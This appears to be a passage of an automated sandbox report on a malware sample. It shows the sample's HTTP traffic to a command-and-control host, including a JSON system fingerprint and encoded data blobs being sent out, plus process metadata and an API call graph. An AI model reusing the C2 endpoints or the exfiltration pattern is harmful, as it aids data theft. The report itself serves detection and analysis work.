Dec 28, 2024 09:42:50.770298004 CET | 2472 | OUT | Data Raw: 38 41 79 6a 57 5c 2f 61 52 5c 2f 37 6f 39 5c 2f 36 76 76 34 57 31 5c 2f 4b 44 58 39 32 5c 2f 73 2b 50 2b 53 39 38 66 66 2b 79 51 38 44 66 5c 2f 41 46 63 2b 4f 5a 5c 2f 43 33 37 55 37 5c 2f 6c 47 54 36 48 48 5c 2f 41 47 66 66 36 61 66 5c 2f 41 4b
Data Ascii: 8AyjW\/aR\/7o9\/6vv4W1\/KDX92\/s+P+S98ff+yQ8Df\/AFc+OZ\/C37U7\/lGT6HH\/AGff6af\/AK7\/AOg8V6Kkk7fjUdf6hn+IgVXqxUT9fw\/qaAGVH5fv+n\/16kooOgr0VJJ2\/H+lR0AM2D3\/AM\/hUGZP73+fyq1UUjY\/Dk\/Xt\/n3q+d+X9fM6BlQsu33FTUVXOvP+vmBXoqVo\/Tj2P8An\/GoqOdef9fM
Dec 28, 2024 09:42:50.770374060 CET | 2472 | OUT | Data Raw: 6c 42 30 46 61 54 6d 4e 6e 32 46 50 4d 34 48 39 44 2b 46 48 79 66 4a 73 68 32 52 5c 2f 36 52 5c 2f 7a 39 66 30 5c 2f 7a 2b 56 50 5c 2f 41 4f 57 6a 70 50 38 41 4a 36 52 35 5c 2f 77 42 62 5c 2f 6e 46 51 2b 59 5c 2f 38 53 58 50 2b 74 38 33 5c 2f 41
Data Ascii: lB0FaTmNn2FPM4H9D+FHyfJsh2R\/6R\/z9f0\/z+VP\/AOWjpP8AJ6R5\/wBb\/nFQ+Y\/8SXP+t83\/AFv7j\/P0rb3\/AO7+IDMJ8\/zyf88pfM6Y\/wA\/570\/7vyfu\/L\/ANUcS+3+fbBoWQx722B3\/wBV\/wDr\/wA+9MaRPnd0t9\/bzOYKoBnmPId+y3\/d\/nN\/nuPf2p8m+Te\/+p8qLzf+Prz\/ADvW69\/\
Dec 28, 2024 09:42:50.770392895 CET | 2472 | OUT | Data Raw: 45 64 44 30 66 78 62 5a 65 45 4a 35 76 69 76 38 48 66 41 2b 72 66 45 76 34 35 36 68 2b 7a 68 38 4b 66 43 58 6a 33 56 50 69 6c 61 2b 4a 66 69 5a 38 59 4c 48 52 66 41 2b 74 52 65 46 66 44 73 5c 2f 67 72 34 51 65 4f 5c 2f 42 75 69 5c 2f 77 42 70 72
Data Ascii: EdD0fxbZeEJ5viv8HfA+rfEv456h+zh8KfCXj3VPila+JfiZ8YLHRfA+tReFfDs\/gr4QeO\/Bui\/wBpr8RfCmm6dq3j\/wAY+C9GbU9R2XmoWdjDLfr4t4e+K3gbxDa6TNaeL\/CL397Bqn9t+Hk1PV7fXvBeqaVq9\/pUuheJ4tc8O6HpMupTrZLqUMnhXWPFGmR2N5bw3uo2mrxX2l2f6NlfiBwBWzevwhlGd5as0yit\/Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.44973281.29.149.125802336C:\Users\user\Desktop\QMtCX5RLOP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 28, 2024 09:42:52.362814903 CET12360OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                          Host: home.fiveth5ht.top
                                                          Accept: */*
                                                          Content-Type: application/json
                                                          Content-Length: 501797
                                                          Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 32 30 33 39 37 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                                          Data Ascii: { "ip": "8.46.123.189", "current_time": "8532915458317203975", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 696 }, { "name": "svchost.exe" [TRUNCATED]
                                                          Dec 28, 2024 09:42:52.482470989 CET2472OUTData Raw: 70 58 38 35 4c 36 63 76 68 4d 5c 2f 2b 61 64 38 52 66 38 41 77 30 38 4d 2b 76 38 41 30 56 33 6d 66 31 62 5c 2f 41 4d 55 35 76 47 37 5c 2f 41 4b 4b 6e 77 72 5c 2f 38 50 66 46 33 5c 2f 77 42 41 35 5c 2f 4b 4e 55 63 6e 62 38 66 36 56 2b 34 33 37 54
                                                          Data Ascii: pX85L6cvhM\/+ad8Rf8Aw08M+v8A0V3mf1b\/AMU5vG7\/AKKnwr\/8PfF3\/wBA5\/KNUcnb8f6V+437Tv8AwS10HQdA+JOrfs7S+ItS1T4Y+LbbTrrwt4h1GPV9W8SeH7v4b+AfGE0+nXMFnYQvrOn6j4k1RYrGKzi+36ctvBCH1C2A1D8Q54J7WeW2uYZILiCR4poZUaOWKWNirxyIwDK6sCGUgEEV+7+FfjLwV4wZbi8fwp
                                                          Dec 28, 2024 09:42:52.482600927 CET2472OUTData Raw: 76 5c 2f 4a 38 6d 65 76 6d 2b 76 66 2b 66 38 36 5a 5c 2f 63 66 5a 6e 39 37 35 76 66 70 5c 2f 68 5c 2f 68 51 64 63 4e 76 6e 2b 69 49 66 4c 32 37 5c 2f 6b 66 62 35 76 38 41 79 30 48 34 66 58 72 54 50 6e 2b 56 5c 2f 77 44 58 4f 66 38 41 57 5c 2f 35
                                                          Data Ascii: v\/J8mevm+vf+f86Z\/cfZn975vfp\/h\/hQdcNvn+iIfL27\/kfb5v8Ay0H4fXrTPn+V\/wDXOf8AW\/5\/z2qXnO\/95\/nn7V\/X\/wCvTZIz8nz4cf5\/Oont8\/0ZvT6\/L9SHzNzbP4z\/AM8z\/rs\/59feoambfIXj7SfX9z9Ov+e3NM67\/kk3\/wDPOP05\/wA54rI6KfX5fqVjs8x3H\/bOSMc+\/wDn6fSmxb5P
                                                          Dec 28, 2024 09:42:52.482652903 CET  2472  OUT  Data Raw: 2b 7a 38 5c 2f 77 41 50 2b 43 61 55 2b 76 79 5c 2f 55 5a 38 38 63 61 52 6f 38 59 5c 2f 65 33 50 37 7a 5c 2f 6e 74 2b 50 72 36 5c 2f 54 46 47 66 34 30 65 53 46 35 66 33 76 6d 66 36 69 41 5a 5c 2f 6e 33 34 70 37 53 66 4d 79 66 66 6a 6a 5c 2f 64 66
                                                          Data Ascii: +z8\/wAP+CaU+vy\/UZ88caRo8Y\/e3P7z\/nt+Pr6\/TFGf40eSF5f3vmf6iAZ\/n34p7SfMyffjj\/df6rjv\/pWfSnyRuuzYn8\/tH17e3\/1zWZofuQ\/3j+H8hTae\/X8P6mmVxcj8v6+R\/k+frp+xB4ju5\/gvqOjLcM1pp\/i7V9Pu9Mn23On3trNa6Xq0a3+mXJnsb22afULkCG6tngdklzEx3u\/vuvfC74aeJvMk
                                                          Dec 28, 2024 09:42:52.482697964 CET  2472  OUT  Data Raw: 6a 42 34 65 30 5c 2f 57 5c 2f 43 76 37 57 76 37 4f 6b 66 78 37 38 5a 54 61 42 70 56 31 71 43 5c 2f 73 55 2b 4a 5c 2f 41 35 38 61 2b 47 50 67 35 72 6e 69 52 6f 72 74 74 42 38 65 5c 2f 47 62 78 37 70 38 6d 71 65 42 76 67 37 71 50 6c 7a 52 36 64 50
                                                          Data Ascii: jB4e0\/W\/Cv7Wv7Okfx78ZTaBpV1qC\/sU+J\/A58a+GPg5rniRorttB8e\/Gbx7p8mqeBvg7qPlzR6dPow1SzghlbTm1DzX\/nu\/wCCjfga1+HH7WnxB8J2uqXeufZNP8H6jd61qGm+HNK1HVb\/AMQeFtK8QX15f2nhTRfD2h\/aTc6nJEZrXSbaSeKKKW7a4u2nuZv6WfGnxE8H\/FrWP2AfiT8P9atfEXgzxp8ftd8QeH
                                                          Dec 28, 2024 09:42:52.482722998 CET  2472  OUT  Data Raw: 49 71 73 75 37 38 4b 68 5c 2f 77 44 51 50 38 5c 2f 68 30 5c 2f 7a 69 72 6e 6c 2b 5c 2f 77 43 6e 5c 2f 77 42 65 71 7a 52 2b 33 79 66 79 41 5c 2f 7a 78 6a 50 76 51 64 50 76 5c 2f 41 4e 33 38 53 47 52 63 66 66 38 41 2b 57 6e 72 32 78 5c 2f 6e 38 73
                                                          Data Ascii: Iqsu78Kh\/wDQP8\/h0\/zirnl+\/wCn\/wBeqzR+3yfyA\/zxjPvQdPv\/AN38SGRcff8A+Wnr2x\/n8s+lRDf\/AB59s\/5x6dKsS\/xfh\/So\/L9\/0\/8Ar0G1Pr8v1I6gbvs\/z\/n37+1WWXb7ioZO34\/0oOwofP8APx9\/r06D\/PtzS7v+Wfb\/AOt9Ks+Xzv8A\/wBfXr9M9vX2qrJH8v8ArPrzn\/P+RQaU+vy\
                                                          Dec 28, 2024 09:42:52.482742071 CET  2472  OUT  Data Raw: 57 66 6d 5c 2f 75 50 2b 76 72 5c 2f 36 5c 2f 66 38 41 57 71 33 79 53 66 75 39 6e 7a 78 6e 39 31 2b 36 5c 2f 77 41 5c 2f 35 5c 2f 57 66 61 2b 63 76 36 2b 5a 30 44 46 5c 2f 6a 33 5c 2f 49 6b 6e 2b 74 50 66 72 78 5c 2f 50 6e 36 69 68 4a 48 77 6e 6b
                                                          Data Ascii: Wfm\/uP+vr\/6\/f8AWq3ySfu9nzxn91+6\/wA\/5\/Wfa+cv6+Z0DF\/j3\/Ikn+tPfrx\/Pn6ihJHwnkvv\/eiLzOkH+en+eaftf5P9X\/rf89\/89Oc0ySP+PZs\/6aGXz8dfX8f\/ANdHtfOX9fMBm1I5N6fOP9bL\/wBNv0\/rjv1pd37twnmb44v4Ivr\/AJ\/rzTo\/7m+NPMi\/1n\/LCHv\/AJ\/mKZ5n7zfvk\/Pv
                                                          Dec 28, 2024 09:42:52.482829094 CET  4944  OUT  Data Raw: 32 62 63 5c 2f 38 41 4d 6a 5c 2f 45 64 75 4f 66 37 76 68 42 71 5c 2f 4b 37 39 76 7a 34 78 5c 2f 44 37 34 32 66 47 58 77 7a 34 6e 2b 47 4f 75 5c 2f 38 41 43 53 2b 48 64 4e 2b 47 47 69 65 48 72 7a 55 7a 70 65 74 36 4e 35 65 74 57 76 69 6e 78 6e 71
                                                          Data Ascii: 2bc\/8AMj\/EduOf7vhBq\/K79vz4x\/D742fGXwz4n+GOu\/8ACS+HdN+GGieHrzUzpet6N5etWvinxnqVzZLZ6\/pml30ghstW06U3KWxtXNwY45nkhmVP9KP2Wvg99IDwz+k5TzHjLwp8YeAeEcz4G4oy\/N8w4n4E4z4X4dxlaMcFisrweYYvNsqwOXVqyxtGNbAUa9SVRV4OVCPNzH+cf7SXxW8D\/EP6O1XAcJeJfhTxv
                                                          Dec 28, 2024 09:42:52.482966900 CET  2472  OUT  Data Raw: 6c 42 30 46 61 54 6d 4e 6e 32 46 50 4d 34 48 39 44 2b 46 48 79 66 4a 73 68 32 52 5c 2f 36 52 5c 2f 7a 39 66 30 5c 2f 7a 2b 56 50 5c 2f 41 4f 57 6a 70 50 38 41 4a 36 52 35 5c 2f 77 42 62 5c 2f 6e 46 51 2b 59 5c 2f 38 53 58 50 2b 74 38 33 5c 2f 41
                                                          Data Ascii: lB0FaTmNn2FPM4H9D+FHyfJsh2R\/6R\/z9f0\/z+VP\/AOWjpP8AJ6R5\/wBb\/nFQ+Y\/8SXP+t83\/AFv7j\/P0rb3\/AO7+IDMJ8\/zyf88pfM6Y\/wA\/570\/7vyfu\/L\/ANUcS+3+fbBoWQx722B3\/wBV\/wDr\/wA+9MaRPnd0t9\/bzOYKoBnmPId+y3\/d\/nN\/nuPf2p8m+Te\/+p8qLzf+Prz\/ADvW69\/\
                                                          Dec 28, 2024 09:42:52.482990026 CET  2472  OUT  Data Raw: 45 64 44 30 66 78 62 5a 65 45 4a 35 76 69 76 38 48 66 41 2b 72 66 45 76 34 35 36 68 2b 7a 68 38 4b 66 43 58 6a 33 56 50 69 6c 61 2b 4a 66 69 5a 38 59 4c 48 52 66 41 2b 74 52 65 46 66 44 73 5c 2f 67 72 34 51 65 4f 5c 2f 42 75 69 5c 2f 77 42 70 72
                                                          Data Ascii: EdD0fxbZeEJ5viv8HfA+rfEv456h+zh8KfCXj3VPila+JfiZ8YLHRfA+tReFfDs\/gr4QeO\/Bui\/wBpr8RfCmm6dq3j\/wAY+C9GbU9R2XmoWdjDLfr4t4e+K3gbxDa6TNaeL\/CL397Bqn9t+Hk1PV7fXvBeqaVq9\/pUuheJ4tc8O6HpMupTrZLqUMnhXWPFGmR2N5bw3uo2mrxX2l2f6NlfiBwBWzevwhlGd5as0yit\/Z
                                                          Dec 28, 2024 09:42:52.602093935 CET  2472  OUT  Data Raw: 49 75 72 57 71 54 6a 54 6f 77 6e 55 6b 6f 76 35 58 68 58 67 48 6a 48 6a 65 4f 5a 54 34 55 79 44 48 5a 33 44 4a 73 50 48 47 5a 74 55 77 69 70 4b 6c 6c 32 44 63 31 42 34 76 47 56 61 31 57 6c 54 6f 59 57 6d 33 7a 56 38 52 55 6c 47 6a 68 36 61 6c 56
                                                          Data Ascii: IurWqTjTownUkov5XhXgHjHjeOZT4UyDHZ3DJsPHGZtUwipKll2Dc1B4vGVa1WlToYWm3zV8RUlGjh6alVrzp0oymq9fbH7JX7cvxE\/Y+03xxp3gPwj4J8TL49vtBvdWk8Yxa\/P9lPhyDVYLBNOTQ9b0Qx+YNavWu2upLsS7bUQpb+VKbj5xtfh54d1rQ\/DmueEf2iv2bvGSeMfjP4e\/Z88Iabpt7+0t4b1PxZ8XfEukTa\
                                                          Dec 28, 2024 09:42:53.691572905 CET  212  IN  HTTP/1.0 503 Service Unavailable
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                          2           192.168.2.4  49733        81.29.149.125   80                2336  C:\Users\user\Desktop\QMtCX5RLOP.exe
                                                          Timestamp  Bytes transferred  Direction  Data
                                                          Dec 28, 2024 09:42:54.861097097 CET  284  OUT  POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                          Host: home.fiveth5ht.top
                                                          Accept: */*
                                                          Content-Type: application/json
                                                          Content-Length: 143
                                                          Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                          Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
                                                          Dec 28, 2024 09:42:56.168260098 CET  212  IN  HTTP/1.0 503 Service Unavailable
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                          0           192.168.2.4  49730        34.226.108.155  443               2336  C:\Users\user\Desktop\QMtCX5RLOP.exe
                                                          Timestamp  Bytes transferred  Direction  Data
                                                          2024-12-28 08:42:47 UTC  52  OUT  GET /ip HTTP/1.1
                                                          Host: httpbin.org
                                                          Accept: */*
                                                          2024-12-28 08:42:48 UTC  224  IN  HTTP/1.1 200 OK
                                                          Date: Sat, 28 Dec 2024 08:42:47 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 31
                                                          Connection: close
                                                          Server: gunicorn/19.9.0
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Credentials: true
                                                          2024-12-28 08:42:48 UTC  31  IN  Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                          Data Ascii: { "origin": "8.46.123.189"}



                                                          Target ID: 0
                                                          Start time: 03:42:42
                                                          Start date: 28/12/2024
                                                          Path: C:\Users\user\Desktop\QMtCX5RLOP.exe
                                                          Wow64 process (32bit): true
                                                          Commandline: "C:\Users\user\Desktop\QMtCX5RLOP.exe"
                                                          Imagebase: 0xd40000
                                                          File size: 4'480'512 bytes
                                                          MD5 hash: 3657BC0028F37DA206A1530AA895F62E
                                                          Has elevated privileges: true
                                                          Has administrator privileges: true
                                                          Programmed in: C, C++ or other language
                                                          Reputation: low
                                                          Has exited: true


                                                            Execution Graph

                                                            Execution Coverage: 4%
                                                            Dynamic/Decrypted Code Coverage: 24.6%
                                                            Signature Coverage: 15.8%
                                                            Total number of Nodes: 455
                                                            Total number of Limit Nodes: 59
                                                            execution_graph 71442 e0a080 71445 e09740 71442->71445 71444 e0a09b 71446 e09780 71445->71446 71450 e0975d 71445->71450 71447 e09925 RegOpenKeyExA 71446->71447 71446->71450 71448 e0995a RegQueryValueExA 71447->71448 71447->71450 71449 e09986 RegCloseKey 71448->71449 71449->71450 71450->71444 71103 d431d7 71104 d431f4 71103->71104 71105 d43200 71104->71105 71109 d43223 71104->71109 71110 d415b0 _lock 71105->71110 71107 d4321e 71108 d432dc CloseHandle 71108->71107 71109->71108 71110->71107 71111 d42f17 71119 d42f2c 71111->71119 71112 d431d3 71113 d42fb3 RegOpenKeyExA 71113->71119 71114 d4315c RegEnumKeyExA 71115 d431b2 RegCloseKey 71114->71115 71114->71119 71115->71119 71116 d43046 RegOpenKeyExA 71117 d43089 RegQueryValueExA 71116->71117 71116->71119 71118 d4313b RegCloseKey 71117->71118 71117->71119 71118->71119 71119->71112 71119->71113 71119->71114 71119->71116 71119->71118 71451 d4f7b0 71452 d4f97a 71451->71452 71453 d4f7c3 71451->71453 71453->71452 71454 d4f932 71453->71454 71474 d4fec0 7 API calls 71453->71474 71459 d7cd80 71454->71459 71457 d4f942 71458 d4f9bb WSACloseEvent 71457->71458 71458->71452 71460 d7d0e5 71459->71460 71462 d7cd9a 71459->71462 71460->71457 71461 d7ce6b 71463 d7d064 71461->71463 71473 d7cf4b 71461->71473 71476 d7dc30 socket ioctlsocket connect getsockname closesocket 71461->71476 71462->71460 71462->71461 71475 d7dc30 socket ioctlsocket connect getsockname closesocket 71462->71475 71464 d7d0b4 71463->71464 71479 d7de00 socket ioctlsocket connect getsockname closesocket 71463->71479 71480 d5f6c0 7 API calls 71464->71480 71471 d7d016 71471->71463 71478 d7de00 socket ioctlsocket connect getsockname closesocket 71471->71478 71472 d56fa0 select 71472->71473 71473->71471 71473->71472 71477 d7e130 socket ioctlsocket connect getsockname closesocket 71473->71477 71474->71453 71475->71462 71476->71461 71477->71473 71478->71471 71479->71463 71480->71460 71120 d78b50 71121 d78b6b 
71120->71121 71138 d78bb5 71120->71138 71122 d78bf3 71121->71122 71123 d78b8f 71121->71123 71121->71138 71140 d7a550 71122->71140 71159 d56e40 select 71123->71159 71126 d78bfc 71130 d78c35 71126->71130 71131 d78c1f connect 71126->71131 71137 d78cb2 71126->71137 71126->71138 71127 d78cd9 SleepEx getsockopt 71128 d78d18 71127->71128 71132 d78d43 71128->71132 71128->71137 71129 d7a150 getsockname 71136 d78dff 71129->71136 71155 d7a150 71130->71155 71131->71130 71135 d7a150 getsockname 71132->71135 71135->71138 71136->71138 71160 d478b0 closesocket 71136->71160 71137->71129 71137->71136 71137->71138 71139 d78ba1 71139->71127 71139->71137 71139->71138 71141 d7a575 71140->71141 71145 d7a597 71141->71145 71162 d475e0 71141->71162 71143 d478b0 closesocket 71144 d7a713 71143->71144 71144->71126 71146 d7a811 setsockopt 71145->71146 71151 d7a83b 71145->71151 71153 d7a69b 71145->71153 71146->71151 71148 d7af56 71149 d7af5d 71148->71149 71148->71153 71149->71144 71150 d7a150 getsockname 71149->71150 71150->71144 71151->71153 71154 d7abe1 71151->71154 71168 d76be0 8 API calls 71151->71168 71153->71143 71153->71144 71154->71153 71167 da67e0 ioctlsocket 71154->71167 71156 d7a15f 71155->71156 71158 d7a1d0 71155->71158 71157 d7a181 getsockname 71156->71157 71156->71158 71157->71158 71158->71139 71159->71139 71161 d478c5 71160->71161 71161->71138 71163 d47607 socket 71162->71163 71165 d475ef 71162->71165 71164 d4762b 71163->71164 71164->71145 71165->71163 71166 d47643 71165->71166 71166->71145 71167->71148 71168->71154 71481 d795b0 71482 d795c8 71481->71482 71484 d795fd 71481->71484 71483 d7a150 getsockname 71482->71483 71482->71484 71483->71484 71485 d76ab0 71486 d76ad5 71485->71486 71487 d76bb4 71486->71487 71489 d56fa0 select 71486->71489 71488 df5ed0 7 API calls 71487->71488 71491 d76ba9 71488->71491 71490 d76b54 71489->71490 71490->71487 71490->71491 71492 d76b5d 71490->71492 71492->71491 71494 df5ed0 71492->71494 71497 df5a50 71494->71497 71496 df5ee5 71496->71492 71498 df5a58 
71497->71498 71504 df5ea0 71497->71504 71499 df5b50 71498->71499 71509 df5a99 71498->71509 71510 df5b88 71498->71510 71502 df5b7a 71499->71502 71503 df5eb4 71499->71503 71499->71510 71500 df5e96 71530 e09480 socket ioctlsocket connect getsockname closesocket 71500->71530 71520 df70a0 71502->71520 71531 df6f10 socket ioctlsocket connect getsockname closesocket 71503->71531 71504->71496 71507 df5ec2 71507->71507 71509->71510 71513 df70a0 6 API calls 71509->71513 71527 df6f10 socket ioctlsocket connect getsockname closesocket 71509->71527 71514 df5cae 71510->71514 71528 df5ef0 socket ioctlsocket connect getsockname 71510->71528 71513->71509 71514->71500 71516 e0a920 71514->71516 71529 e09320 socket ioctlsocket connect getsockname closesocket 71514->71529 71517 e0a944 71516->71517 71518 e0a94b 71517->71518 71519 e0a977 send 71517->71519 71518->71514 71519->71514 71523 df70ae 71520->71523 71522 df71a7 71522->71510 71523->71522 71524 df717f 71523->71524 71532 e0a8c0 71523->71532 71536 df71c0 socket ioctlsocket connect getsockname 71523->71536 71524->71522 71537 e09320 socket ioctlsocket connect getsockname closesocket 71524->71537 71527->71509 71528->71510 71529->71514 71530->71504 71531->71507 71533 e0a903 recvfrom 71532->71533 71534 e0a8e6 71532->71534 71535 e0a8ed 71533->71535 71534->71533 71534->71535 71535->71523 71536->71523 71537->71522 71169 d4255d 71214 10c9f70 71169->71214 71171 d4256c GetSystemInfo 71172 d42589 71171->71172 71173 d425a0 GlobalMemoryStatusEx 71172->71173 71174 d425ec 71173->71174 71216 6e50199 71174->71216 71221 6e50258 71174->71221 71225 6e5005c 71174->71225 71231 6e5001e 71174->71231 71237 6e5029d 71174->71237 71241 6e5011d 71174->71241 71245 6e50014 71174->71245 71251 6e50093 71174->71251 71257 6e50109 71174->71257 71261 6e5004a 71174->71261 71268 6e50349 GetLogicalDrives 71174->71268 71270 6e50149 71174->71270 71274 6e5024f 71174->71274 71278 6e50209 71174->71278 71282 6e501cd 71174->71282 71286 6e5018c 71174->71286 71290 6e50282 
71174->71290 71294 6e500cd 71174->71294 71300 6e500ba 71174->71300 71304 6e50000 71174->71304 71310 6e502f8 71174->71310 71314 6e501bb 71174->71314 71318 6e50332 71174->71318 71322 6e502bd 71174->71322 71326 6e5006b 71174->71326 71332 6e50234 71174->71332 71336 6e501ef 71174->71336 71340 6e50129 71174->71340 71344 6e50167 71174->71344 71348 6e500e6 71174->71348 71175 d42762 71178 d427d6 KiUserCallbackDispatcher 71175->71178 71176 d4263c GetDriveTypeA 71177 d42655 GetDiskFreeSpaceExA 71176->71177 71179 d4261b 71176->71179 71177->71179 71180 d427f8 71178->71180 71179->71175 71179->71176 71181 d428d9 FindFirstFileW 71180->71181 71182 d42906 FindNextFileW 71181->71182 71183 d42928 71181->71183 71182->71182 71182->71183 71215 10c9f7d 71214->71215 71215->71171 71215->71215 71217 6e5014a 71216->71217 71218 6e501ad GetLogicalDrives 71216->71218 71217->71179 71220 6e50379 71218->71220 71222 6e50289 GetLogicalDrives 71221->71222 71224 6e50379 71222->71224 71226 6e50030 71225->71226 71227 6e5004a GetLogicalDrives 71226->71227 71228 6e50098 GetLogicalDrives 71226->71228 71227->71226 71230 6e50379 71228->71230 71233 6e50030 71231->71233 71232 6e5004a 2 API calls 71232->71233 71233->71232 71234 6e50098 GetLogicalDrives 71233->71234 71236 6e50379 71234->71236 71238 6e502d0 GetLogicalDrives 71237->71238 71240 6e50379 71238->71240 71242 6e50121 GetLogicalDrives 71241->71242 71244 6e50379 71242->71244 71247 6e50027 71245->71247 71246 6e5004a 2 API calls 71246->71247 71247->71246 71248 6e50098 GetLogicalDrives 71247->71248 71250 6e50379 71248->71250 71253 6e50030 71251->71253 71252 6e5004a 2 API calls 71252->71253 71253->71251 71253->71252 71254 6e50098 GetLogicalDrives 71253->71254 71256 6e50379 71254->71256 71258 6e5010d GetLogicalDrives 71257->71258 71260 6e50379 71258->71260 71262 6e5005c GetLogicalDrives 71261->71262 71263 6e50030 71262->71263 71264 6e5004a GetLogicalDrives 71263->71264 71265 6e50098 GetLogicalDrives 71263->71265 71264->71263 71267 6e50379 71265->71267 71269 
6e50379 71268->71269 71271 6e50150 GetLogicalDrives 71270->71271 71273 6e50379 71271->71273 71275 6e5025c GetLogicalDrives 71274->71275 71277 6e50379 71275->71277 71279 6e5020d GetLogicalDrives 71278->71279 71281 6e50379 71279->71281 71283 6e501ff GetLogicalDrives 71282->71283 71285 6e50379 71283->71285 71287 6e50190 GetLogicalDrives 71286->71287 71289 6e50379 71287->71289 71291 6e502aa GetLogicalDrives 71290->71291 71293 6e50379 71291->71293 71296 6e50030 71294->71296 71295 6e5004a 2 API calls 71295->71296 71296->71295 71297 6e50098 GetLogicalDrives 71296->71297 71299 6e50379 71297->71299 71301 6e500c5 GetLogicalDrives 71300->71301 71303 6e50379 71301->71303 71306 6e50016 71304->71306 71305 6e5004a 2 API calls 71305->71306 71306->71305 71307 6e50098 GetLogicalDrives 71306->71307 71309 6e50379 71307->71309 71311 6e502fd GetLogicalDrives 71310->71311 71313 6e50379 71311->71313 71315 6e50160 GetLogicalDrives 71314->71315 71317 6e50379 71315->71317 71319 6e5033e GetLogicalDrives 71318->71319 71321 6e50379 71319->71321 71323 6e502d1 GetLogicalDrives 71322->71323 71325 6e50379 71323->71325 71327 6e50030 71326->71327 71329 6e50098 GetLogicalDrives 71326->71329 71328 6e5004a 2 API calls 71327->71328 71327->71329 71328->71327 71331 6e50379 71329->71331 71333 6e5025b GetLogicalDrives 